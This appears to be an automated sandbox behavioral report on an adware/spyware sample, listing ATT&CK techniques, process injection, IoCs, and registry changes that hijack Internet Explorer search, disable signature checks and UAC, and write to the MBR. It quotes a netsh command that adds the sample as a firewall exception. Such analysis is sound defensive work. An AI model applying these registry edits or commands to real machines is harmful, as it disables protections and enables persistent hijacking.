behavioral1/memory/1532-302-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-432-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-433-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-464-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-465-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-467-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-469-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-470-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-471-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-493-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-494-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-495-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-496-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-497-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-635-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-637-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-640-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-641-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-642-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-657-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-662-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-665-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-659-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-658-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-661-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-664-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-668-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-667-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-669-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-670-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-671-0x0000000013140000-0x000000001372D000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mofcomp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe

Modifies Internet Explorer settings 1 TTPs 11 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IIL = "0"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\ltHI = "0"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\ltTST = "14182"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://findgala.com/?&uid=2330&q={searchTerms}"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2330&q={searchTerms}"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2330&q={searchTerms}"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2330&q={searchTerms}"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Modifies registry class 16 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.DocHostUIHandler\ = "Implements DocHostUIHandler"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Software	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Software\Microsoft	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Software\Microsoft\Internet Explorer	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Software\Microsoft\Internet Explorer\SearchScopes	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2330&q={searchTerms}"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.DocHostUIHandler	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.DocHostUIHandler"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.DocHostUIHandler\Clsid	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeSecurityPrivilege	484	mofcomp.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 1532	2156	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	30
PID 2156 wrote to memory of 1532	2156	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	30
PID 2156 wrote to memory of 1532	2156	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	30
PID 2156 wrote to memory of 1532	2156	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	30
PID 2156 wrote to memory of 1532	2156	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	30
PID 2156 wrote to memory of 1532	2156	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	30
PID 1532 wrote to memory of 484	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	31
PID 1532 wrote to memory of 484	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	31
PID 1532 wrote to memory of 484	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	31
PID 1532 wrote to memory of 484	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	31
PID 1532 wrote to memory of 1776	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	32
PID 1532 wrote to memory of 1776	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	32
PID 1532 wrote to memory of 1776	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	32
PID 1532 wrote to memory of 1776	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	32
PID 1532 wrote to memory of 2832	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	35
PID 1532 wrote to memory of 2832	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	35
PID 1532 wrote to memory of 2832	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	35
PID 1532 wrote to memory of 2832	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	35
PID 1532 wrote to memory of 2660	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	37
PID 1532 wrote to memory of 2660	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	37
PID 1532 wrote to memory of 2660	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	37
PID 1532 wrote to memory of 2660	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	37
PID 1532 wrote to memory of 608	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	40
PID 1532 wrote to memory of 608	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	40
PID 1532 wrote to memory of 608	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	40
PID 1532 wrote to memory of 608	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	40
PID 1532 wrote to memory of 316	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	42
PID 1532 wrote to memory of 316	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	42
PID 1532 wrote to memory of 316	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	42
PID 1532 wrote to memory of 316	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	42
PID 1532 wrote to memory of 1056	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	44
PID 1532 wrote to memory of 1056	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	44
PID 1532 wrote to memory of 1056	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	44
PID 1532 wrote to memory of 1056	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	44
PID 1532 wrote to memory of 320	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	46
PID 1532 wrote to memory of 320	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	46
PID 1532 wrote to memory of 320	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	46
PID 1532 wrote to memory of 320	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	46
PID 1532 wrote to memory of 108	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	48
PID 1532 wrote to memory of 108	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	48
PID 1532 wrote to memory of 108	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	48
PID 1532 wrote to memory of 108	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	48
PID 1532 wrote to memory of 2948	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	50
PID 1532 wrote to memory of 2948	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	50
PID 1532 wrote to memory of 2948	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	50
PID 1532 wrote to memory of 2948	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	50
PID 1532 wrote to memory of 1148	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	52
PID 1532 wrote to memory of 1148	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	52
PID 1532 wrote to memory of 1148	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	52
PID 1532 wrote to memory of 1148	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	52
PID 1532 wrote to memory of 1772	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	54
PID 1532 wrote to memory of 1772	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	54
PID 1532 wrote to memory of 1772	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	54
PID 1532 wrote to memory of 1772	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	54
PID 1532 wrote to memory of 1992	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	56
PID 1532 wrote to memory of 1992	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	56
PID 1532 wrote to memory of 1992	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	56
PID 1532 wrote to memory of 1992	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	56
PID 1532 wrote to memory of 1188	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	58
PID 1532 wrote to memory of 1188	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	58
PID 1532 wrote to memory of 1188	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	58
PID 1532 wrote to memory of 1188	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	58
PID 1532 wrote to memory of 2196	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	61
PID 1532 wrote to memory of 2196	1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	61

System policy modification 1 TTPs 7 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "2"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "2"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

C:\Users\Admin\AppData\Local\Temp\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Users\Admin\AppData\Local\Temp\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe" "C:\Users\Admin\AppData\Local\Temp\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe"
  2⤵
  - UAC bypass
  - Enumerates VirtualBox registry keys
  - Blocks application from running via registry modification
  - Drops file in Drivers directory
  - Event Triggered Execution: Image File Execution Options Injection
  - Loads dropped DLL
  - Adds Run key to start application
  - Checks for any installed AV software in registry
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Writes to the Master Boot Record (MBR)
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:1532
- - C:\Windows\SysWOW64\Wbem\mofcomp.exe
    mofcomp "C:\Users\Admin\AppData\Local\Temp\2282.mof"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:484
- - C:\Windows\SysWOW64\netsh.exe
    netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe" "Best Malware Protection" ENABLE
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1776
